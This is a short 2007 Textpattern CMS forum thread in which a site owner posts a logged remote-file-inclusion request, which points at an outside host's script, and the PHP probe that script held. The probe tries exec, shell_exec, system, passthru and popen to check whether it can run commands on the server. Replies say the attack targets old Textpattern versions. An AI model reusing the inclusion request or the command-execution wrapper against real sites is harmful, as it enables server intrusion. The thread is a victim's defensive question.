Textpattern CMS support forum
You are not logged in. Register | Login | Help
- Topics: Active | Unanswered
Pages: 1
#1 2007-10-19 07:59:42
- Moofle
- New Member
- Registered: 2007-10-19
- Posts: 1
Bot doing Security Attacks/Checks
Hi,
I’ve been noticing that someone tried an attack on my txp site.
It came in the logs like this :
/article//textpattern/publish.php?txpcfg[txpath]=http://www.v3.astrolabium.pl/test.txt?
And the test.txt contains this code, any idea of what it’s doing? :
<?php
if((eregi("uid",ex("id"))) || (eregi(“Windows”,ex(“net start”)))){
$contrs=0;
}
else{
ini_restore(“safe_mode”);
ini_restore(“open_basedir”);
if((eregi("uid",ex("id"))) || (eregi(“Windows”,ex(“net start”)))){
$contrs=0;}
else{
$contrs=1;
}}
if($contrs == 0){
echo(“FUCKSAFEMODEOFFBYMIC22”);
}else{
echo(“FUCKSAFEMODEONBYMIC22”);
}
function ex($cfe){
$res = ‘’;
if (!empty($cfe)){
if(function_exists(‘exec’)){
exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = shell_exec($cfe);
}
elseif(function_exists(‘system’)){
ob_start();
system($cfe);
$res = ob_get_contents();
ob_end_clean();
}
elseif(function_exists(‘passthru’)){
ob_start();
passthru($cfe);
$res = ob_get_contents();
ob_end_clean();
}
elseif(is_resource($f = popen($cfe,“r”))){
$res = “”;
while(!@feof($f)) { $res .= fread($f,1024); }
pclose($f);
}}
return $res;
}
exit;
Offline
Re: Bot doing Security Attacks/Checks
I had similar attacks, some from university sites. For those I used the contact forms of the universities and the offending scripts (some similar to the above and others just spam referrers) were removed. Regarding the site above, I’m not sure if i would contact them.
Yiannis
——————————
NeMe | hblack.art | EMAP | A Sea change | Toolkit of Care
I do my best editing after I click on the submit button.
Offline
Re: Bot doing Security Attacks/Checks
That attack is aimed at an old TXP version. If you’re running a recent 4.0.x version, it can’t do any harm.
Offline
Pages: 1